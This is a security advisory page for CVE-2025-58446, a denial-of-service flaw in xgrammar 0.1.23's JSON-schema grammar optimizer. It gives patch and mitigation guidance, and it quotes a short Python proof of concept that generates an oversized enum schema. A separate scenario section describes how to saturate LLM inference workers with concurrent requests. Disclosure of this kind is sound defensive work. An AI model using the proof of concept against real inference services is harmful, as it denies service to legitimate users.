CVE-2025-58446: xgrammar: DoS via oversized JSON schema grammar parsing

GHSA-9q5r-wfvf-rr7f MEDIUM PoC AVAILABLE CISA: TRACK*
Published September 5, 2025
CISO Take

xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.

Risk Assessment

Effective risk is medium-high for exposed inference endpoints, despite the medium CVSS. The attack surface is any API that accepts caller-supplied JSON schemas for structured generation — a common pattern in agentic and enterprise LLM deployments. EPSS is very low (0.00091), suggesting no current active exploitation, but the PoC is fully public and requires zero AI/ML expertise to execute. Impact is availability, not confidentiality — a single malicious request can monopolize an inference thread for minutes, enabling throughput starvation against multi-tenant or high-availability deployments.

Affected Systems

Package Ecosystem Vulnerable Range Patched
xgrammar pip = 0.1.23 0.1.24
1.7K 152 dependents Pushed 7d ago 100% patched ~5d to patch Full package profile →

Do you use xgrammar? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
0.1%
chance of exploitation in 30 days
Higher than 26% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

5 steps
  1. Patch

    Upgrade xgrammar to v0.1.24 or later — the fix optimizes the grammar optimizer and disables slow paths for large grammars.

  2. Short-term workaround

    Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema().

  3. Rate limiting

    Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits.

  4. Detection

    Alert on grammar parsing durations exceeding 10 seconds — this is anomalous and indicative of exploitation.

  5. Audit exposure

    Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.

CISA SSVC Assessment

Decision Track*
Exploitation poc
Automatable Yes
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.6 - AI system operation and monitoring A.8.4 - AI system resources
NIST AI RMF
MANAGE-2.4 - Risks and benefits of the AI system are communicated to relevant AI actors MEASURE-2.5 - AI system to be deployed satisfies its requirements for availability
OWASP LLM Top 10
LLM04 - Model Denial of Service

Frequently Asked Questions

What is CVE-2025-58446?

xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.

Is CVE-2025-58446 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-58446, increasing the risk of exploitation.

How to fix CVE-2025-58446?

1. **Patch**: Upgrade xgrammar to v0.1.24 or later — the fix optimizes the grammar optimizer and disables slow paths for large grammars. 2. **Short-term workaround**: Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema(). 3. **Rate limiting**: Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits. 4. **Detection**: Alert on grammar parsing durations exceeding 10 seconds — this is anomalous and indicative of exploitation. 5. **Audit exposure**: Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.

What systems are affected by CVE-2025-58446?

This vulnerability affects the following AI/ML architecture patterns: model serving, structured output pipelines, LLM inference APIs, agentic tool-calling pipelines.

What is the CVSS score for CVE-2025-58446?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary Provided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser. ### Details Full reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers. ### Patch This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars. Thanks to @Seven-Streams ### PoC ``` import string import random def enum_schema(size=10000,str_len=10): enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]} schema = { "definitions": { "colorEnum": enum }, "type": "object", "properties": { "color1": { "$ref": "#/definitions/colorEnum" }, "color2": { "$ref": "#/definitions/colorEnum" }, "color3": { "$ref": "#/definitions/colorEnum" }, "color4": { "$ref": "#/definitions/colorEnum" }, "color5": { "$ref": "#/definitions/colorEnum" }, "color6": { "$ref": "#/definitions/colorEnum" }, "color7": { "$ref": "#/definitions/colorEnum" }, "color8": { "$ref": "#/definitions/colorEnum" } }, "required": [ "color1", "color2" ] } return schema schema_enum = enum_schema() print(schema_enum) print(test_schema(schema_enum, {})) ``` where: ``` def test_schema(schema, instance): grammar = xgr.Grammar.from_json_schema( json.dumps(schema), strict_mode=True ) return _is_grammar_accept_string(grammar, json.dumps(instance)) ``` ### Impact DOS

Exploitation Scenario

An adversary targeting a multi-tenant LLM API (e.g., an enterprise copilot or structured data extraction service) crafts a JSON schema with thousands of enum values totaling over 100k characters — trivially generated with the public PoC. They submit this as the response_format schema in a constrained generation request. The xgrammar optimizer enters a slow computation path, blocking the inference thread for several minutes. By issuing a small number of concurrent requests (5–10), the attacker can saturate all inference workers, causing complete service unavailability for legitimate users. The attack costs pennies in compute and requires no authentication bypass or specialized knowledge, only awareness of the library version and the public PoC.

Timeline

Published
September 5, 2025
Last Modified
September 10, 2025
First Seen
March 24, 2026

Related Vulnerabilities